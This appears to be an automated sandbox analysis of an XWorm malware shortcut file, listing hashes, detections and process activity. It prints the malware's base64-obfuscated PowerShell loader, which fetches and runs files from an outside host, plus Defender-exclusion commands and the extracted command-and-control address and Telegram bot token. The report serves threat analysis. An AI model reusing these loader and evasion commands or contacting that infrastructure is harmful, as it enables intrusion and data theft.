Analysis
-
max time kernel
114s -
max time network
300s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-11-2024 00:43
Static task
static1
Behavioral task
behavioral1
Sample
Saturday Nov 16 RFQ 120HQ.lnk
Resource
win7-20240903-en
General
-
Target
Saturday Nov 16 RFQ 120HQ.lnk
-
Size
215KB
-
MD5
614423a0f5b8a21a0ae2d957b46cef3c
-
SHA1
529c5271a1b4cef778dc48b2dd6edfeddd24c38c
-
SHA256
506db308fda3797a3474eab41654ba925cd3ba3582f638b92400ba3767294de6
-
SHA512
6dd13c5927b99c804e20ed0412d7279c40ddbce7c626e536c2d4a11e6455203c82780db5d53fda5552fdf590633c76e83c0c6aaaf83e3c2d528e9e5a59298af4
-
SSDEEP
6144:M+HZ4aKBKefy7xCfE2CQT7FSwehrQWatIJEr0a6NQ:M+mGwy70fHCQThS9Z2aaMQ
Malware Config
Extracted
xworm
5.0
185.162.75.19:7000
AyJZQz7cchpO5oie
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot6460930418:AAGMLktYHOrDqJ5cDoT5GtLWliQfxKax0DI/sendMessage?chat_id=6746471576
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/memory/4408-41-0x0000000032CD0000-0x0000000032CE8000-memory.dmp family_xworm behavioral2/memory/4408-43-0x0000000032CD0000-0x0000000032CE2000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 9 264 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1808 powershell.exe 1220 powershell.exe 2720 powershell.exe 264 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\myscript.lnk WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2720 set thread context of 4408 2720 powershell.exe 92 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_regbrowsers.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4408 aspnet_regbrowsers.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 264 powershell.exe 264 powershell.exe 2720 powershell.exe 2720 powershell.exe 1808 powershell.exe 1808 powershell.exe 1220 powershell.exe 1220 powershell.exe 4408 aspnet_regbrowsers.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 264 powershell.exe Token: SeDebugPrivilege 2720 powershell.exe Token: SeDebugPrivilege 4408 aspnet_regbrowsers.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeDebugPrivilege 1220 powershell.exe Token: SeDebugPrivilege 4408 aspnet_regbrowsers.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4408 aspnet_regbrowsers.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 4380 wrote to memory of 264 4380 cmd.exe 84 PID 4380 wrote to memory of 264 4380 cmd.exe 84 PID 264 wrote to memory of 5024 264 powershell.exe 88 PID 264 wrote to memory of 5024 264 powershell.exe 88 PID 5024 wrote to memory of 3404 5024 WScript.exe 89 PID 5024 wrote to memory of 3404 5024 WScript.exe 89 PID 3404 wrote to memory of 2720 3404 cmd.exe 91 PID 3404 wrote to memory of 2720 3404 cmd.exe 91 PID 2720 wrote to memory of 4408 2720 powershell.exe 92 PID 2720 wrote to memory of 4408 2720 powershell.exe 92 PID 2720 wrote to memory of 4408 2720 powershell.exe 92 PID 2720 wrote to memory of 4408 2720 powershell.exe 92 PID 2720 wrote to memory of 4408 2720 powershell.exe 92 PID 2720 wrote to memory of 4408 2720 powershell.exe 92 PID 2720 wrote to memory of 4408 2720 powershell.exe 92 PID 2720 wrote to memory of 4408 2720 powershell.exe 92 PID 4408 wrote to memory of 1808 4408 aspnet_regbrowsers.exe 97 PID 4408 wrote to memory of 1808 4408 aspnet_regbrowsers.exe 97 PID 4408 wrote to memory of 1808 4408 aspnet_regbrowsers.exe 97 PID 4408 wrote to memory of 1220 4408 aspnet_regbrowsers.exe 100 PID 4408 wrote to memory of 1220 4408 aspnet_regbrowsers.exe 100 PID 4408 wrote to memory of 1220 4408 aspnet_regbrowsers.exe 100
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Saturday Nov 16 RFQ 120HQ.lnk"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -NoExit -Command "$6VcZuEYj = 'aXdyIC1VcmkgaHR0cHM6Ly9xdS5heC93VkVQei5wZGYgLU91dEZpbGUgJGVudjpURU1QXFNhdHVyZGF5IE5vdiAxNiBSRlEgMTIwSFEucGRmO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXFNhdHVyZGF5IE5vdiAxNiBSRlEgMTIwSFEucGRmO2l3ciAtVXJpIGh0dHBzOi8vcXUuYXgvdHdCa1guanMgLU91dEZpbGUgJGVudjpURU1QXGFVSXFLcC5qcztTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxhVUlxS3AuanM7JGNsPSdNU093U0YnOyRjbD0nTVNPd1NGJztFeGl0';$ZSr2rv13TMa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($6VcZuEYj));Invoke-Expression -Command $ZSr2rv13TMa"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:264 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aUIqKp.js"3⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\UPDATE.ps1""4⤵
- Suspicious use of WriteProcessMemory
PID:3404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\UPDATE.ps1"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'aspnet_regbrowsers.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1220
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
1KB
MD50f6a3762a04bbb03336fb66a040afb97
SHA10a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA25636e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69
-
Filesize
18KB
MD5a6a131e25bde6c50ec71dfd7ccdc2d95
SHA117c085ed9c9cb1791aafbbdbf137ca98afaafcf8
SHA2565f61f7aac6a983fce3e6e8e0228477d28741f3f14d743f94945d6452083c8867
SHA5126dcd8e0f274bfb641b60bb1df59dfb3845503be15cf773cac07ebe7b6c156294745e13cdde62b704e658f29eed0c8d089c84798af032fee20ca7c16e2bbe67f5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
199KB
MD54ceb1057e744898bc02ffe2a9daa061a
SHA1ccc89e9d665bc204347fbc7346957ed65ef983ba
SHA256d2c8b31ed90c86ec267b673178ce22b36096ff8d705cbf9b5fa8ed4bac87550b
SHA5123a71dba04527b03bb0ee1384f92b33eaa3de7bb3f1521997fd3151ef9ce553bfb5608054919b37c35f0f6f611acf59805949e586e52e3ca2cfc85e57f246c87a
-
Filesize
196KB
MD567ea1d562d1ed27916829a569dbc7fb5
SHA17d083620f91219c67b7e0a2925a3cb8c987d00ee
SHA25661b54b21f003b1133e63b76fe99a0750303e17a7cc93ea4535c5533b028b1781
SHA5125d03188a7e5e3fd5f9702b9ac2255cc8d5f23dc0d101f5ffb84d411d0c89021af704383f8f2ee88af3a696a7576b8a338fa4140d9396ff6a6e299f1b511d39b4